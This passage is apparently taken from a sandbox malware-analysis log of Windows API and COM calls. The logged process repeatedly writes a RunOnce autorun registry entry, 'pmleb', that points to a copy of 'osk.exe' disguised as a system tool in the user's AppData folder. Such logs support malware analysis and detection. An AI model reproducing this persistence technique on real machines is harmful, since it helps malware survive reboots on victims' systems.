pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.033] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x68 [0092.033] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.033] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.033] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.033] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.033] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.033] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.034] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.034] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.034] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.034] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.034] RegCloseKey (hKey=0x280) returned 0x0 [0092.034] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.035] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.035] SetTimer (hWnd=0x20280, nIDEvent=0x21e4, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e4 [0092.035] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.046] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.046] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.046] KillTimer (hWnd=0x20280, uIDEvent=0x21e4) returned 1 [0092.046] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.046] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.047] IUnknown:Release (This=0x787518) returned 0x1 [0092.047] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.047] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.047] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.047] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.047] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.048] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x69 [0092.048] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.048] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6a [0092.048] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.052] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x69 [0092.052] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.052] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.052] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.052] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.053] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.053] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.053] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.053] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.053] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.053] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.053] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.053] RegCloseKey (hKey=0x280) returned 0x0 [0092.054] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.054] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.054] SetTimer (hWnd=0x20280, nIDEvent=0x21e5, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e5 [0092.054] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.061] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.061] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.062] KillTimer (hWnd=0x20280, uIDEvent=0x21e5) returned 1 [0092.062] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.062] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.062] IUnknown:Release (This=0x787518) returned 0x1 [0092.062] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.062] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.063] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.063] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.063] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.063] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6a [0092.063] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.063] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6b [0092.064] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.064] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6a [0092.065] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.065] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.065] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.065] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.065] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.065] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.065] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0092.065] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0092.065] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0092.065] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0092.066] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0092.066] RegCloseKey (hKey=0x280) returned 0x0 [0092.066] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.066] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.066] SetTimer (hWnd=0x20280, nIDEvent=0x21e6, uElapse=0xa, lpTimerFunc=0x0) returned 0x21e6 [0092.066] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0092.077] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0092.077] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0092.077] KillTimer (hWnd=0x20280, uIDEvent=0x21e6) returned 1 [0092.077] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0092.077] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0092.077] IUnknown:Release (This=0x787518) returned 0x1 [0092.078] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0092.078] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0092.078] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0092.078] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0092.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0092.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0092.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0092.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0092.078] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0092.079] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6b [0092.079] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0092.079] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6c [0092.079] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0092.080] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6b [0092.080] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.080] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0092.080] IUnknown:Release (This=0x7a9740) returned 0x1 [0092.080] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0092.080] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0092.080] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0092.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0092.080] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", 